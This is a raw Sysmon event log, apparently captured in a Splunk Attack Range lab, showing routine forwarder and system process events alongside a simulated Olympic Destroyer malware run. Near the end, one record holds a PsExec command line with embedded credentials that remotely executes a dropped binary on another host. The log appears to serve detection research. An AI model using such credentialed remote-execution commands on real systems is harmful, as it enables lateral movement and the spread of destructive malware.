10:59:20.538{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293697Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.538{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293696Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.538{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293695Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.536{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1388-6216-7106-000000003802}6456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293694Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.528{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1388-6216-7106-000000003802}6456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293693Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.528{C8EA50B7-1388-6216-7106-000000003802}6456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000293692Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.522{C8EA50B7-1388-6216-7006-000000003802}69206400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000293691Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:18.570{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53825-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293690Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.213{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A001F7C5D85C14869110AA4B282C1947,SHA256=3ECA026E59C3B76FB242F259241223E495C9F7669D854E67864604A804511C9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218144Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:20.176{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CDC3D0F6B935CE58215AC1D7757BAA4,SHA256=AA5661B5C03B18ED342ACA9D0E71DD20A12CAB0955C29FC7C0CEBFF15BBF2427,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293689Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.012{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1388-6216-7006-000000003802}6920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293688Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.012{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293687Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.012{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293686Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.012{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293685Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.012{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293684Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.012{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1388-6216-7006-000000003802}6920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293683Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.012{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1388-6216-7006-000000003802}6920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293682Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.014{C8EA50B7-1388-6216-7006-000000003802}6920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000293719Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.917{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1389-6216-7306-000000003802}6472C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293718Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.917{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293717Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.917{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293716Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.917{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293715Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.917{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293714Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.917{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-1389-6216-7306-000000003802}6472C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000293713Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.923{C8EA50B7-1389-6216-7306-000000003802}6472C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.1 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000293712Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.917{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1389-6216-7306-000000003802}6472C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000293711Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.917{C8EA50B7-1373-6216-6806-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000293710Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.250{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97BCDC9BB7F3ACABC066DE73CC9D9C5C,SHA256=E6E0CAB27E0837B54515A705BFBF3935E7D7EF13019ECB3421223896ACF82E32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218145Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:21.191{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB34A6F43A64A81C1AAAED2DB52A4CDC,SHA256=67BBCFC4763B5A7F5E8592A947FBB6AA553C3870CBA0D1F3980402E49B371E4B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293709Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.148{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1389-6216-7206-000000003802}6684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293708Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:21.147{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 